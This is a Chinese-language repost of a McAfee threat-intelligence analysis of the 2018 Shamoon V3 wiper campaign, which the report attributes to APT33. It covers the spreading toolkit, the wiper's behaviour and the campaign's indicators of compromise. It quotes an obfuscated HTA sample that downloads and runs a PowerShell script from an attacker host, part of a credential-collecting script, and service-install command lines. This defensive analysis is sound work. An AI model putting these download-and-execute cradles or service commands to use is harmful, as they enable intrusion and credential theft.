在上周,McAfee高级威胁研究小组发布了一篇分析文章。在这篇文章中,该研究小组分析了针对中东和欧洲企业的新一波Shamoon“wiper(磁盘擦除恶意软件)”攻击活动,并讨论了最新Shamoon攻击活动与此前Shamoon攻击活动的区别。其中最值得关注的是,最新版本的Shamoon(Shamoon V3)作为一个wiper模块,也作为一种独立的恶意软件被使用。

基于对Shamoon V3的分析以及其他一些线索,,该研究小组得出了这样一个结论,这些攻击背后的幕后黑手很可能是伊朗黑客组织APT33,或一个试图伪装成APT33的黑客组织。

在2016到2017年期间的Shamoon攻击活动中,攻击者同时使用了Shamoon V2和另一种wiper——Stonedrill。而在2018年的攻击活动中,该研究小组观察到了Shamoon V3和另一款最初由赛门铁克提到的wiper——Filerase。

该研究小组的分析表明,最新版本的Shamoon似乎只是一个包含多个模块的.Net工具包的一部分。具体来说,该研究小组确认了以下模块:

  • OCLC.exe:用于读取攻击者创建的目标计算机列表,并负责运行第二个工具spreader.exe。
  • Spreader.exe:用于向目标计算机传播wiper。另外,它也被用于获取有关操作系统版本的信息。
  • SpreaderPsexec.exe:与spreader.exe类似,但它使用的是psexec.exe来远程执行wiper。
  • SlHost.exe:wiper模块,遍历系统并擦除每一个目标文件。

这也反映出,至少有多名开发人员参与了为最新一波攻击准备恶意软件的工作。该研究小组曾在上一篇文章中指出,Shamoon V3作为.Net工具包中的一个wiper模块,它也可作为一种独立的恶意软件供其他攻击组织使用。从最近的这些攻击来看,这种假设似乎得到了证实。该研究小组还了解到,攻击者在数个月前就已经启动了新活动的前期准备工作,目标旨在通过wiper的执行来破坏目标系统。

这篇文章提供了有关新一波Shamoon攻击的更多见解,以及对.Net工具包的详细分析。

地缘政治背景

与此前一样,攻击的动机尚不明确。因为,Shamoon V1攻击的是位于中东的两个目标,Shamoon V2攻击的是位于沙特阿拉伯的多个目标,而Shamoon V3利用欧洲的供应商对中东企业发起了供应链攻击。

在这个.Net工具包中,该研究小组发现了如下ASCII图案:

这些字符组成了一个类似于阿拉伯文“تَبَّتْ يَدَا أَبِي لَهَبٍ وَتَبَّ”的图案。这是古兰经(Surah Masad, Ayat 1 [111:1])中的一句话,意思是“愿火焰之父的双手毁灭吧!他已经毁灭。”

攻击流程

恶意软件是如何进入受害者的网络的?

该研究小组的分析表明,攻击者在前期准备阶段创建了一些与某些合法域名(提供就业机会的网站)非常相似的网站。例如:

Hxxp://possibletarget.ddns.com:880/JobOffering

由该研究小组发现的许多URL都与主要在中东运营的能源企业有关,其中一些网站还包含有执行其他payload的恶意HTML应用程序文件,其余网站则旨在诱使受害者使用自己的凭证进行登录。根据McAfee的遥测数据,这些攻击似乎是从2018年8月底开始的,而目的就是收集这些凭证。

以下是一个恶意HTML应用程序文件的代码示例:

YjDrMeQhBOsJZ = “WS”

wcpRKUHoZNcZpzPzhnJw = “crip”

RulsTzxTrzYD = “t.Sh”

MPETWYrrRvxsCx = “ell”

PCaETQQJwQXVJ = (YjDrMeQhBOsJZ + wcpRKUHoZNcZpzPzhnJw + RulsTzxTrzYD + MPETWYrrRvxsCx)

OoOVRmsXUQhNqZJTPOlkymqzsA=new ActiveXObject(PCaETQQJwQXVJ)

ULRXZmHsCORQNoLHPxW = “cm”

zhKokjoiBdFhTLiGUQD = “d.e”

KoORGlpnUicmMHtWdpkRwmXeQN = “xe”

KoORGlpnUicmMHtWdp = “.”

KoORGlicmMHtWdp = “(‘http://mynetwork.ddns.net:880/*****.ps1’)

OoOVRmsXUQhNqZJTPOlkymqzsA.run(‘%windir%\System32\’ + FKeRGlzVvDMH + ‘ /c powershell -w 1 IEX (New-Object Net.WebClient)’+KoORGlpnUicmMHtWdp+’downloadstring’+KoORGlicmMHtWdp)

OoOVRmsXUQhNqZJTPOlkymqzsA.run(‘%windir%\System32\’ + FKeRGlzVvDMH + ‘ /c powershell -window hidden -enc

上面这个脚本被用于在受害者的计算机上打开一个命令shell,并从外部下载一个PowerShell脚本。对PowerShell脚本的分析表明,它被用于收集用户名、密码和域名等信息。以下是PowerShell脚本的部分代码:

function primer {

if ($env:username -eq “$($env:computername)$”){$u=”NT AUTHORITY\SYSTEM”}else{$u=$env:username}

$o=”$env:userdomain\$u

$env:computername

$env:PROCESSOR_ARCHITECTURE

通过收集到的凭证,攻击者能够登录到目标网络中,并传播wiper。

.Net工具包

如上所述,新一波Shamoon攻击是通过一个.Net工具包进行的,旨在传播ShamoonV3和Filerase。

第一个模块(OCLC.exe)被用于读取存储在两个本地目录(“shutter”和“light”)中的两个文本文件,它们包含有目标计算机列表。

另外,OCLC.exe也被用于启动一个新的隐藏命令窗口进程来运行第二个模块Spreader.exe,该模块被用于使用上述两个文本文件作为参数,以传播ShamoonV3和Filerase。

首先,Spreader.exe模块会使用上述包含目标计算机列表和Windows版本的两个文本文件作为参数,以检查目标计算机的Windows版本。

然后,将可执行文件(Shamoon和Filerase)放入文件夹“Net2”中。

另外,它还会在远程计算机上创建一个文件夹:C:\Windows\System32\Program Files\Internet Explorer\Signing。

然后,将上述可执行文件复制到该文件夹中。

接下来,它会创建一个批处理文件“\RemoteMachine\admin$\process.bat”来运行远程计算机上的可执行文件。需要注意的是,这个批处理文件包含了可执行文件的路径。然后,它会设置运行批处理文件的权限。

如果上述过程失败,Spreader.exe模块还会创建一个名为“NotFound.txt”的文本文件,其中包含目标计算机名称和操作系统版本。攻击者可以通过它来追踪传播过程中出现的问题。

以下展示的是上述过程所涉及到的一些函数:

如果在文件夹“Net2”中不存在可执行文件,Spreader.exe模块则会检查文件夹“all”和“Net4”。

为了传播wiper,攻击者还使用了另一个模块SpreaderPsexec.exe。需要说明的是,Psexec.exe是微软PSTools工具中的一种用于远程执行命令的管理工具。

这里的区别在于,SpreaderPsexec.exe使用的Psexec.exe存储在文件夹“Net2”中。这意味着它也可以在其他计算机上使用,以进一步传播wiper。

wiper包含三个选项:

  • SilentMode:在没有任何输出的情况下运行wiper。
  • BypassAcl:提升权限。值得注意的是,它始终是开启的。
  • PrintStackTrace:追踪已擦除的文件夹和文件的数量。

如上所述,BypassAcl始终是开启的(始终为“true” )。它为wiper提供了以下权限:

  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeTakeOwnershipPrivilege
  • SeSecurityPrivilege

为了找到目标文件,wiper使用了GetFullPath函数来获取路径。

它会擦除找到的每一个目标文件夹和文件。

正如文章一开头所说的那样,它能够遍历系统每一个文件夹中的每一个文件。

对于要擦除的文件和文件夹,wiper首先会移除它们的“只读”属性。

接下来,它会将每个文件的创建、修改及访问时间都更改为3000年1月1日 12:01:01。

然后,它会使用随机字符串对每个文件进行两次重写。

 

它首先会使用带有ACCESS_MASK DELETE flag的API CreateFile擦除文件。

然后,使用FILE_DISPOSITION_INFORMATION擦除文件。

ProcessTracker函数则被用来追踪擦除的情况。

总结

McAfee高级威胁研究小组表示,在2017年的Shamoon攻击浪潮中,他们观察到了两种wiper。在2018年12月的攻击中,他们观察到了类似的特征。采用“工具包”的形式,攻击者可以通过受害者的网络来传播wiper模块。工具包是采用.Net编写的,且没有经过混淆处理。这与作为wiper模块的Shamoon V3不同,它的代码是经过加密处理的,作为一种逃避安全检测的手段。

很难确定这些攻击的动机,因为McAfee高级威胁研究小组还没有找到足够的线索。但他们表示,确实在Shamoon V3中看到了出现在Shamoon V2中的技术。另外,政治声明似乎已经成为Shamoon攻击的一部分。在V1中,攻击者使用了一张正在燃烧的美国国旗的图片。在V2中,攻击者使用了一张溺亡的叙利亚男孩的图片(附带有也门阿拉伯语的文字),似乎暗指叙利亚和也门的冲突。现在,我们在V3中看到了一段摘自《古兰经》的句子,可能预示着攻击的动机与另一场中东冲突有关。

通过对比在这些攻击中使用的TTP(战术、技术和流程),以及域名和工具(如FireEye在其报告中所描述的),McAfee高级威胁研究小组得出结论,这些攻击背后的幕后黑手很可能是伊朗黑客组织APT33,或一个试图伪装成APT33的黑客组织。

IOC

散列值:

  • OCLC.exe: d9e52663715902e9ec51a7dd2fea5241c9714976e9541c02df66d1a42a3a7d2a
  • Spreader.exe: 35ceb84403efa728950d2cc8acb571c61d3a90decaf8b1f2979eaf13811c146b
  • SpreaderPsexec.exe: 2ABC567B505D0678954603DCB13C438B8F44092CFE3F15713148CA459D41C63F
  • Slhost.exe: 5203628a89e0a7d9f27757b347118250f5aa6d0685d156e375b6945c8c05eb8a

文件路径和文件名:

  • C:\net2\
  • C:\all\
  • C:\net4\
  • C:\windows\system32\
  • C:\Windows\System32\Program Files\Internet Explorer\Signing
  • \admin$\process.bat
  • NothingFound.txt
  • MaintenaceSrv32.exe
  • MaintenaceSrv64.exe
  • SlHost.exe
  • OCLC.exe
  • Spreader.exe
  • SpreaderPsexec.exe

命令行:

  • cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat
  • cmd.exe /c “ping -n 30 127.0.0.1 >nul && sc config MaintenaceSrv binpath= C:\windows\system32\MaintenaceSrv64.exe LocalService” && ping -n 10 127.0.0.1 >nul && sc start MaintenaceSrv
  • MaintenaceSrv32.exe LocalService
  • cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat ” “
  • MaintenaceSrv32.exe service

声明:本文来自黑客视界,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如有侵权,请联系 anquanneican@163.com。